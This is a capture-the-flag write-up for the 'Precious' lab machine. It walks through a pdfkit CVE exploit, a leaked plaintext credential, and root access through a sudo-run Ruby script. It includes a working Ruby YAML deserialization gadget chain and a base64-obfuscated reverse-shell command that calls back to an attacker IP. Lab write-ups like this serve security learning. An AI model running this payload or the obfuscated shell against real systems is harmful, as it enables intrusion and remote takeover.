Enumeration
Start with an Nmap scan.
nmap -sC -sV 10.10.11.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 01:06 EDT
Nmap scan report for 10.10.11.189
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| 256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_ 256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.35 seconds
SSH port and web server are open.
However, It failed to redirect to the domain address. Let’s add it to the file.
echo "10.10.11.189 precious.htb" | sudo tee -a /etc/hosts
Now, let’s visit the web page and see how it looks.
It’s a file conversion web page.
I did the Nmap scan again since we added the domain to the etc/hosts file.
80/tcp open http nginx 1.18.0
|_http-title: Convert Web Page to PDF
| http-server-header:
| nginx/1.18.0
|_ nginx/1.18.0 + Phusion Passenger(R) 6.0.15
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We’ve got more information about the web server.
And if you see the response header, you can find out it’s using ruby.
I tried inputting many web pages to convert PDFs, but they all failed.
So, I created a test HTML file and opened a web server on my server.
Then, I managed to convert the file.
The target web page output a file, so I checked the file’s metadata.
The file is converted using the pdfkit tool.
User flag
Since I knew the version of the tool, I searched for vulnerabilities.
https://github.com/UNICORDev/exploit-CVE-2022-25765
I found the GitHub page above.
I managed to get a reverse shell using the tool.
But, we are not allowed to see a user’s flag yet due to permission issues.
I enumerated directories to find some credential information.
I discovered a user henry’s credential on /home/ruby/.bundle
.
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
Switch user and I found the flag on henry’s home directory.
Root flag
For privilege escalation, I checked sudo list first.
/usr/bin/ruby /opt/update_dependencies.rb
We can execute the file with sudo command.
Check the file script.
It’s loading dependencies.yml
file.
Now it’s quite obvious what to do.
I want to write reverse shell code in that file. But the problem is, I don’t have write permission!
The file path is relative, not an absolute path. meaning we can try to create a file in other directories.
At the end of googling, I learned anyone can create a file in /tmp
and /var/tmp
directory. The directories are world-writable.
Ok, so my plan is to create dependencies.yml in the /tmp directory and run it using the sudo command.
To do that, I prepared ruby deserialization script.
You can find it here.
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id
method_id: :resolve
If we execute the file with the source code above, we get the result below.
id command is executed. So, let’s write a command for a reverse shell in git_set.
git_set: echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNS82NjY2IDA+JjE=|base64 -d| bash
The trick is for the system to input base 64 encoded payload, decode it, and then finally execute it using bash.
Execute the sudo command then we are in as root.
Learning
Through this machine, I learned 2 new things.
- tmp directory is world-writable. Since anyone can write a file, it can be very useful (dangerous).
- base64 encoded payload. I can remove the white spaces and hide the content by inputting the encoded payload.